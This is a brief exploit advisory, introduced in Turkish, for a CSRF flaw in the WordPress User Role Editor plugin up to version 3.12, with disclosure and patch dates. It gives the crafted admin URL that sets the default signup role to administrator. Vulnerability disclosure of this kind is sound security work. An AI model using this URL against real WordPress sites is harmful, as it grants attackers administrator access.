WordPress User Role Editor Plugin 3.12 – CSRF ve XSS açığıl bulunmuş oluş açık hakkında exploit yazarının açıklamaları aşağıdaki şekildedir.
# Exploit Title: WP User Role Editor CSRF # Date: 19/5/13 # Exploit Author: Henry Hoggard # Author Website: http://henryhoggard.co.uk # Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor # Software Link:https://wordpress.org/support/plugin/user-role-editor # Version: <=3.12 # Tested on: Debian # CVE : none yet Notified Dev: 16/05/13 Patch Released (3.14): 17/05/13 Description: This allows you to sign up with admin privileges if you make the admin visit your CSRF script. http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator